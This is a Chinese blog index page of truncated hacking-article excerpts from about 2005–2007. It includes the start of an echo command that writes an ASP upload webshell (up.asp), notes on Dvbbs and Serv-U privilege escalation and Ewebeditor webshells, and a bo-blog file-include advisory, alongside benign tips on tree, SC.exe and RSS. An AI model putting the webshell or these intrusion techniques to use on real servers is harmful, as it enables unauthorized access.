分类 ‘技术文章’ 下的日志

Do All in Cmd Shell (一切尽在命令行)

update(2007.5.16):关于up.asp上传文件出现问题的解决方法,来自安全焦点论坛int21
https://www.xfocus.net/bbs/index.php?act=ST&f=15&t=47505
出现这种问题的原因是IUSR_XXX 用户默认情况下对有些目录(包括c:\inetpub\wwwroot)不可写,就算把IIS主目录选上”写入”属性也是一样的.一般C:\是可写的,现在把UP.ASP改一下就可以用了.

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile  阅读全文 »
Tags: ,

动网论坛权限提升漏洞

文章作者:focn & jinsdb
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

在6月份的黑防上看到《动网7.1漏洞惊现江湖》一文,说是admin_postings.asp文件

存在注入漏洞,但利用的前提是拥有超级斑竹或前台管理员权限。我想起以前发现的动网7.x版本存在一个前台权限提升漏洞,
正好可以结合起来利用。这个前台权限提升漏洞对7.x的Access和 Sql版都有效。下面我们就以7.0 sp2 sql版,讲解这个漏洞的利用。

漏洞分析
我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限。它是如何取得这个GroupID的呢?让我们看看登录验证的那一段:

login.asp的525行左右

Rem ==========论坛登录函数=========

Rem 判断用户登录

阅读全文 »

黑客动画总结(三)

作者:阿汀qq86494359 来源:www.hack6.com

2005年6月21日到30日黑客动画总结

这几天忙着毕业答辩了,总结写的比较匆忙.
很多服务器都是被serv-u提权了,看看我做的serv-u配置动画,华夏黑客同盟下载
http://www.77169.org/donghua/Class64/200505/19703.html
要你觉得你提权技术不行的话,请先看看我以前做的动画, 总结的很全的
(有语音)击溃服务器bt权限总结+工具
http://www.hack58.com/Software/catalog2/477.html
(有语音)简单突破权限设置漏洞挂马
http://www.hack58.com/Software/catalog6/456.html
下面继续总结这十天的动画
86.搜索inurl:MirCMS_News, 阅读全文 »

黑客动画总结(二)

作者:阿汀qq86494359 来源:www.hack6.com

上次总结网宽网络的漏洞,他们的负责人找过我,我在这里声明我从没有黑过网宽网络的相关任何站点,这个负责人满口脏话,素质有待提高.而且他说他从没有把任何他做的企业网站放在眼里,还故意加了漏洞,这是他的原话,真可悲呀.
各大黑客网站每天更新的新闻不少,可适合菜鸟的很少,希望我总结的文章菜鸟能看懂并消化。
以下6条是我希望大家做个动画出来的,我想做但没时间啊,我忙着做毕业论文“城市污水脱氮除磷”,郁闷啊,做动画的时候别忘了提一下我阿汀呀:)
动网7.1又出现固顶漏洞,只要有固定权限就能提升为管理员。
Serv-U6.0.0.2的将用户密码存在注册表里的漏洞,本地构造注册表用户导入。
这个月我终于在网上下载到了Windows ASN.1远程溢出工具,强烈推荐。
利用Ewebeditor得到webshall的漏洞,主要因为管理员没改默认设置。
阅读全文 »

新学到一个命令.

tree d: /f >d:list.txt

这个命令可以把D盘下所有目录下的所有文件树保存为一个文档,怎么样列其他的目录就不用说了吧?

用AJAX技术在自己Blog上聚合并显示朋友Blog的最新文章(通过RSS)

来源:Andy's blog

ps:

这个方法有一定的局限性,据反映:这种方法有限制,xmlhttp因为安全限制,不能跨域访问。所以你只要把IE的安全级别提高,你的首页上就keso的blog就出不来了。我发现自己的IE可以出来,结果一查,安全级别已经被修改了,而且修改按钮不能使用了,现在正在想办法回复中。firefox下也不行。
由于javascript是客户端程序,IE对其有所限制,所以不能跨域访问.

另附一个能够实现这个功能的网站http://rss.uooule.com/

有时候,你的Blog可能需要这样的功能:

在自己Blog上聚合并显示朋友Blog的最新文章,这样方便自己及时了解朋友的消息,另外,也方便访问者找到和本Blog相关的blog和文章。
阅读全文 »

SC.exe使用完全指南

来源:www.eviloctal.com

 写这个东西的目的在于让大家了解一下SC这个服务管理程序的使用,另一方面也是为了让大家更进一步的了解到NT,2000的服务的一些基础问题,如果有时间,希望大家好好看看。再来结合起上一次如何打开termservice服务的那篇文章,在服务方面大家应该比较了解了。用这个东西就可以删除在别人机器里留下的如ffsniffer, sksockerver这些东西,不用再担心,装上了删除不了。但是毕竟这个东西还是MS的产品,所以,如eventlog这样的服务,是不可以用它关闭的。累呀累呀,写了我整整一个早上,就是不知道有没有人看!

我们知道在MStools SDK,也就是在Resource Kit有一个很少有人知道的命令行软件,SC.exe,这个软件向所有的Windows NT和Windows 2000要求控制他们的API函数。我们可以在命令行里通过对这些 阅读全文 »

bo-blog index.php include任意php文件漏洞

来源:[F.S.T]火狐技术联盟

文章作者:我非我[F.S.T]

漏洞发现日期:2005.6.13

漏洞涉及版本:Bo-Blog Version <= 1.7.0108(未打补丁前)

漏洞分析及利用:

刚发现bo-blog的一个致命的漏洞。我是看1.7.0095版本的。不过估计最新的也有这个漏洞.在index.php中的job变量没有过滤.导致用户可以任意include一个php文件.

index.php
———————-可爱的分割线—————————–
[codz begin]
33 if (empty($job)) $job="listall";
34 if ($job=="main") $job="listall";

178 if (!file_exists("include/$job.php")) $job="listall";
阅读全文 »